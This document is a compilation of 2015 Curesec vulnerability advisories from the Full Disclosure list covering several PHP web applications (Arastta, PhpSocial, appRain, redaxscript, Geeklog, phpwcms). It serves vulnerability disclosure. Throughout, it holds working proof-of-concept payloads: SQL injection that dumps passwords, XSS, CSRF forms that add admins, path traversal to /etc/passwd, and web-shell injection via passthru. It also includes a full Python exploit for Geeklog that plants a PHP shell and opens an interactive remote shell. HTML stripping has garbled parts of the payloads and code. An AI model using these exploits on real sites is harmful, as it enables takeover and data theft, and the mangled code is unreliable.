Security Advisory - Curesec Research Team 1. Introduction Affected Product:Arastta 1.1.5 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities, one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger. 3. SQL Injection 1 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection, if there wasn't a filter that forbid single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well. Note that an account with the right "Catalog -> Filters" is needed to exploit this issue. Proof of Concept POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1 tag_text[][value]=abc') union all select password from gv4_user -- - Code /admin/model/catalog/product.php public function getTags($tag_name, $filter_tags = null) { [...] $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter); /admin/controller/catalog/product.php public function autocomplete() { [...] if (isset($this->request->get['tag_name'])) { $this->load->model('catalog/product'); if (isset($this->request->get['tag_name'])) { $tag_name = $this->request->get['tag_name']; } else { $tag_name = ''; } $filter = null; if(isset($this->request->post['tag_text'])) { $filter = $this->request->post['tag_text']; } $results = $this->model_catalog_product->getTags($tag_name, $filter); foreach ($results as $result) { $json[] = array( 'tag' => $result, 'tag_id' => $result ); } } 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload. Proof of Concept Visit the setting page: http://localhost/Arastta/admin/index.php?route=setting/setting For the config_language and config_admin_language parameters use: en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) -- - Visiting any site will trigger the injected code. Code /Arastta/system/library/utility.php public function getDefaultLanguage(){ if (!is_object($this->config)) { return; } $store_id = $this->config->get('config_store_id'); if (Client::isAdmin()){ $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'"; } else { $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'"; } $query = $this->db->query($sql); $code = $query->row['value']; $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'"); return $language->row; } 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Arastta 1.1.5: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Arastta 1.1.5 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL is echoed unencoded, leading to XSS. This can be used to inject JavaScript keyloggers or to bypass CSRF protection. If the victim is an admin with the right "Tool -> File Manager", this can lead to code execution via the file manager. 3. Proof of Concept http://localhost/Arastta/index.php/desktops/pc";>alert(1)?sort=pd.name&order=DESC 4. Code /catalog/view/theme/default/template/common/header.tpl 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Arastta-115-XSS-132.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PhpSocial v2.0.0304: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PhpSocial v2.0.0304_2026 Fixed in:not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a new admin: http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/admin/AdminAddViewadmins.php"; method="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, secur...@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PhpSocial v2.0.0304: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PhpSocial v2.0.0304_2026 Fixed in:not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: XSS / Open Redirect Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, the profile fields Name, Birthday, Street Address, City, State, Country, and Phone Number are open to persistent XSS. This can lead to the stealing of cookies, injection of JavaScript keyloggers, and bypassing of CSRF protection. In this case, this can lead to code execution via the template editor. 3. Proof of Concept Visit Profile: http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/ Profile.php?user=[USERNAME] Click edit and use the following for any of the vulnerable fields: 4. Open Redirect CVSS Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N Description PhpSocial is also vulnerable to a reflected open redirect, which may for example be used in phishing attacks. The attack only works if the victim is logged in to PhpSocial. Proof of Concept http://localhost//PhpSocial_v2.0.0304_2026/cms_phpsocial/ UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http:// google.com 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, secur...@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/PhpSocial-v200304-XSS-134.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:appRain 4.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: i...@apprain.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview appRain is described as a Content Management Framework written in PHP. There are various components of appRain 4.0.3 that should not provide the possibility of code execution or arbitrary file upload but do allow it. All of these issues are by default present in the admin area. It should be noted that admins already have code execution via a designated PHP file editor. Still, the code of appRain is explicitly intended to be extended by its users, which means that components such as a seemingly secure file uploader, an image uploader, or a function decoding json should not lead to code execution. 3. Unrestricted Upload of File with Dangerous Type 1 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The file upload uses a blacklist for the file extension to forbid the upload of files with dangerous type. The disallowed extensions are: php,php3,php4,exe,pl,py,bat,sys,dev,sh However, files that can be uploaded and that also lead to code execution are .htaccess, as well as files with extension pht, php5, and phtml. The file upload can be found here: http://localhost/apprain/admin/filemanager An admin account is required to use the file manager. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and will also be an issue if users reuse the varifyFileName function in different contexts, which is to be expected. Code /development/controllers/admin.php if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){ App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']}) is restricted to uploaded.","Error"); App::Config()->redirect("/admin/filemanager/upload"); } else { $path = App::Config()->filemanagerDir(DS); $data = App::Utility()->upload($this->data['filemanager']['image'],$path); App::Module('Notification')->Push("File({$data['file_name']}) uploaded successfully."); App::Config()->redirect("/admin/filemanager"); } /apprain/base/modules/filemanager.php public function varifyFileName($filename){ $restrictedExt = explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT')); return !in_array(App::Utility()->getExt($filename),$restrictedExt); } /development/definition/system_configuration/config.xml: 4. Unrestricted Upload of File with Dangerous Type 2 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When creating a new slide, the label suggests that only images with extensions "*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded, including .php or .pht files. An admin account is required to create new slides. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and may also be an issue if users reuse the involved functions in different contexts. Proof of Concept POST /apprain/information/manage/appslide/add HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42 Connection: keep-alive Content-Type: multipart/form-data; boundary=---418924992299141519661615194 Content-Length: 1178 -418924992299141519661615194 Content-Disposition: form-data; name="data[Option][title]" test -418924992299141519661615194 Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht" Content-Type: application/octet-stream test -418924992299141519661615194 Content-Disposition: form-data; name="data[Option][status]" Active -418924992299141519661615194 Content-Disposition: form-data; name="Button[button_save]" Save -418924992299141519661615194 Content-Disposition: form-data; name="data[Information][id]" -418924992299141519661615194 Content-Disposition: form-data; name="data[Information][type]" appslide -418924992299141519661615194 Content-Disposition: form-data; name="data[Information][page]" -418924992299141519661615194-- 5. Possibly Code Execution CVSS High 7.6AV:N/AC:H/Au:N/C:
[FD] appRain 4.0.3: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: appRain 4.0.3 Fixed in: Fixed via Optional Module CSRF Protection Module http://www.apprain.com/extension/20/accounting-system?s Link: =Description Vendor Website: i...@apprain.com Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public:12/02/2015 Release mode: Coordinated release CVE:requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description None of the requests have CSRF protection. This means that an attacker can execute actions for an admin if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin: http://localhost/apprain-source-4.0.3/admin/manage/add/"; method="POST"> Code Execution (using the PHP file editor): http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php"; method="POST"> http://www.opensource.org/licenses/mit-license.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to lice...@apprain.com so we can send you a copy immediately. * * @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com) * @licensehttp://www.opensource.org/licenses/mit-license.php MIT license * * HELP * * Official Website * http://www.apprain.com/ * * Download Link * http://www.apprain.com/download * * Documents Link * http ://www.apprain.com/docs */ if (version_compare(phpversion(), '5.1.0', '<') === true) { die("Whoops, it looks like you have an invalid PHP version.appRain supports PHP 5.1.0 or newer."); } $appLoc = "../app.php"; if (!file_exists($appLoc)) { die("appRain core file(s) missing... Get a new copy "); } error_reporting(E_ALL); require_once $appLoc; umask(0); App::Run(); passthru($_GET['x']);" /> The injected code can now be executed here: http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls 4. Solution To mitigate this issue please install the "Data Exchange Security" module: http://www.apprain.com/extension/20/accounting-system?s=Description 5. Report Timeline 10/02/ Informed Vendor. Mailbox i...@apprain.com is full, used 2015 secur...@apprain.com instead (no reply) 10/21/ Reminded Vendor of Disclosure Date 2015 10/21/ Vendor announces fix 2015 ~11/02/ Vendor releases optional module for CSRF protection 2015 11/04/ Suggested to vendor that CSRF protection should not be optional (no 2015 reply) 11/17/ CVE Requested (no reply) 2015 12/02/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: Path Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:appRain 4.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: i...@apprain.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "loc" Parameter of the appeditor is vulnerable to directory traversal, which allows the viewing of arbitrary files. Admin credentials are required to view files. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component. 3. Proof of Concept http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 10/02 Informed Vendor. Mailbox i...@apprain.com is full, used /2015 secur...@apprain.com instead (no reply) 10/21 Reminded Vendor of Disclosure Date /2015 10/21 Vendor anounces fix for 11/02/2015 /2015 11/04 No fix released, extended public disclosure date to 11/11/2015 /2015 11/17 CVE Requested (no reply) /2015 11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered /2015 extension if needed (no reply) 12/02 Disclosed to public /2015 Blog Reference: https://blog.curesec.com/article/blog/appRain-403-Path-Traversal-113.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:appRain 4.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: i...@apprain.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of appRain, this may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The search of the file manager echoes user input without encoding, leading to reflected XSS. Proof of Concept http://localhost/apprain-source-4.0.3/admin/filemanager/upload"; method="POST"> alert(1)" /> Code /apprain/base/modules/toolbar.php private function btnFilemanagerSrcBox($srcstr = "") { $html = ' '; return array('box' => $html); } 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The appeditor echoes the given file name and path without encoding, leading to reflected XSS. Proof of Concept http://localhost/apprain-source-4.0.3/appeditor?loc='">alert(1) Code /component/appeditor/controllers/appeditor/index.phtml X 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 10/02 Informed Vendor. Mailbox i...@apprain.com is full, used /2015 secur...@apprain.com instead (no reply) 10/21 Reminded Vendor of Disclosure Date /2015 10/21 Vendor anounces fix for 11/02/2015 /2015 11/04 No fix released, extended public disclosure date to 11/11/2015 /2015 11/05 Vendor asks for list of organizations that may help implementing fixes /2015 11/11 Replied that we do not have lists, and that we do not have the resources /2015 to implement fixes ourselves. Extended release date to 11/18/2015 and offered further extension if needed (no reply) 11/17 CVE Requested (no reply) /2015 11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered /2015 extension if needed (no reply) 12/02 Disclosed to public /2015 Blog Reference: https://blog.curesec.com/article/blog/appRain-403-XSS-115.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] redaxscript 2.5.0: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:redaxscript 2.5.0 Fixed in:module has been removed in version 2.6.0 Fixed Version Link: n/a Vendor Contact: i...@redaxmedia.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The module file_manager allows for file uploads, and uses exif_imagetype to check the validity of the file. By setting the first bytes of the uploaded file to that of a valid image type, an attacker can easily bypass this check and thus upload files of dangerous type. It should be noted that only files with the name index.php will be executed, as access to all other PHP files is forbidden by a htaccess file. An account that has access to the module "File manager" is needed to exploit this issue. 3. Code /modules/file_manager/index.php function file_manager_upload($directory = '') { $file = $_FILES['file']['tmp_name']; $file_name = file_manager_clean_file_name($_FILES['file']['name']); $file_size = $_FILES['file']['size']; /* validate post */ if (function_exists('exif_imagetype')) { if (exif_imagetype($file) == '') { $error = l('file_type_limit', '_file_manager') . l('point'); } } 4. Solution To mitigate this issue please remove the file_manager module. 5. Report Timeline 10/02/2015 Informed Vendor about Issue 11/15/2015 Vendor removes affected module 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/redaxscript-250-Code-Execution-116.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] redaxscript 2.5.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: redaxscript 2.5.0 Fixed in: 2.6.1 Fixed Version Link: http://redaxscript.com/files/releases/ redaxscript_2.6.1_full.zip Vendor Contact: i...@redaxmedia.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to12/02/2015 public: Release mode: Coordinated release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description There is a persistent XSS vulnerability when leaving comments. It requires the admin to hover over a link to trigger the injected code. This issue can lead to the injection of JavaScript keyloggers, or the bypassing of CSRF protection. In this case, this may lead to code execution. The issue has been partially fixed in version 2.6.0. However, it was still possible to inject a style attribute, making XSS in older browsers possible. This has been fixed in version 2.6.1. 3. Proof of Concept 1. Create a comment, as comment text use: comment" onmouseover=alert(1) foo=" 2. In the sidebar, hover over the comment to trigger the XSS. 4. Solution To mitigate this issue please upgrade at least to version 2.6.1: http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor about Issue 11/15/2015 Vendor releases partial fix 11/24/2015 Informed vendor that fix is incomplete 11/25/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/redaxscript-250-XSS-118.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Geeklog 2.1.0 Fixed in:2.1.1b3 Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156 Vendor Contact: geeklog-secur...@lists.geeklog.net Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3. 3. Upload of Files with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin". Proof of Concept POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Length: 761 Content-Type: multipart/form-data; boundary=---10717364298700964751730232773 Cookie: [cookies] -10717364298700964751730232773 Content-Disposition: form-data; name="mode" add -10717364298700964751730232773 Content-Disposition: form-data; name="currentpath" /var/www/geeklog-2.1.0/public_html/images/ -10717364298700964751730232773 Content-Disposition: form-data; name="filepath" test.png -10717364298700964751730232773 Content-Disposition: form-data; name="newfile"; filename="shell.php" Content-Type: image/png http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php' 4. OS Command Injection CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When performing a database backup, various settings are passed unsanitized to exec, leading to code execution. To exploit this issue, an attacker needs a registered user that is in the group "Root". Proof of Concept 1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to: geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo " shell.php;" 2. Perform database backup here: http://localhost/geeklog-2.1.0/public_html/admin/database.php The injected commands will be executed. In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags: geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;" Code /admin/database.php function dobackup() { [...] if (!empty($_CONF['mysqldump_filename_mask'])) { $filename_mask = strftime($_CONF['mysqldump_filename_mask']); } [...] $backupfile = $_CONF['backup_path'] . $filename_mask; [...] $command .= " $_DB_name > \"$backupfile\""; [...] if ($canExec) { exec($command); 5. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: https://www.geeklog.net/filemgmt/visit.php/1156 Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/17/2015 Reminded Vendor of disclosure date 11/17/2015 Vendor points to beta version and announces release 11/24/2015 Informed Vendor of insufficient fix in beta 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: Code Execution Exploit
#!/usr/local/bin/python # Exploit for geeklog-2.1.0 OS Command Injection vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/moderation.php" configPath = "/admin/configuration.php?tab-5" backupPath = "/admin/database.php" shellFileName = "404.php" shellContent = "', csrfRequest.text) return csrfTokenRegEx.group(1) def injectCommand(requestSession, url): csrfToken = getCSRFToken(requestSession, url) postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'} requestSession.post(url, data = postData) def executeCommand(requestSession, url): csrfToken = getCSRFToken(requestSession, url) requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken) def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: could not log in") print("injecting command") injectCommand(requestSession, url + configPath) print("executing command") executeCommand(requestSession, url + backupPath) runShell(url + "/admin/" + shellFileName + "?x=") Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Geeklog 2.1.0 Fixed in:2.1.1b3 Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156 Vendor Contact: geeklog-secur...@lists.geeklog.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description There is at least one XSS vulnerability in the installation script of Geeklog. Geeklog recommends to delete the install directory and displays warnings in the admin area if this is not the case. However, deleting the install directory is not mandatory, so it should be assumed that not all users will delete it. 3. Proof of Concept http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=tealert(1)st.sql $_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF'] may be vulnerable as well, but the attacker would need a valid sql backup file to trigger them. 4. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: https://www.geeklog.net/filemgmt/visit.php/1156 Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-XSS-121.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phpwcms 1.7.9: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: phpwcms 1.7.9 Fixed in: 1.8.0 RC1 Fixed Version https://github.com/slackero/phpwcms/archive/ Link: phpwcms-1.8.0-RC1.zip Vendor Website:http://www.phpwcms.de/ Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to09/29/2015 vendor: Disclosed to 12/02/2015 public: Release mode: Coordinated release CVE: requested, but not assigned CreditsTim Coen of Curesec GmbH 2. Overview phpwcms allows the upload of files with dangerous type, which leads to code execution. Additionally, it allows registered users who are not admins to use PHP tags, which also leads to code execution. Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default (the form to add users is however open to CSRF). 3. Unrestricted Upload of File with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading files, there are no checks as to the type or extension of the file. When uploading single files, these are stored inside the "filearchive" directory. The original file name is changed to the hash of the file name. The directory is protected with a .htaccess file from accessing or executing files directly. Because of this, uploading single files can not easily be exploited; it may however be possible to execute them via include_int_php (see below). However, when uploading multiple files, these are stored temporarily inside the "upload" directory, and these files are not renamed. The "upload" directory is also protected by an .htaccess file, but as .htaccess files can be uploaded, it can be 